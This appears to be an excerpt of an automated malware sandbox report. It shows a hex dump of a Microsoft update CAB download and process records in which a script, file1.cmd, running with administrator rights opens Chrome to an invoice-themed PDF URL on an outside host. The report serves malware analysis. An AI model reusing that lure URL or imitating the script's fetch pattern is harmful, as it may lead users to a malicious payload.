                                                  Host: slscr.update.microsoft.com
                                                  2024-05-23 19:02:03 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440"
                                                  MS-CorrelationId: 955ed26c-99cf-400d-bb81-5e9515d02b93
                                                  MS-RequestId: 088f00d7-b0d5-4997-abe0-7e020b575f4a
                                                  MS-CV: X+QDcGd5c02PNuJ6.0
                                                  X-Microsoft-SLSClientCache: 1440
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Thu, 23 May 2024 19:02:02 GMT
                                                  Connection: close
                                                  Content-Length: 25457
                                                  2024-05-23 19:02:03 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                  Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                  2024-05-23 19:02:03 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                  Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:8
                                                  Start time:15:01:03
                                                  Start date:23/05/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file1.cmd" "
                                                  Imagebase:0x7ff649c10000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:15:01:03
                                                  Start date:23/05/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f010000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:15:01:05
                                                  Start date:23/05/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
                                                  Imagebase:0x7ff6b2cb0000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:13
                                                  Start time:15:01:06
                                                  Start date:23/05/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1952,i,13483178300824636873,598200039164626055,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                  Imagebase:0x7ff6b2cb0000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  No disassembly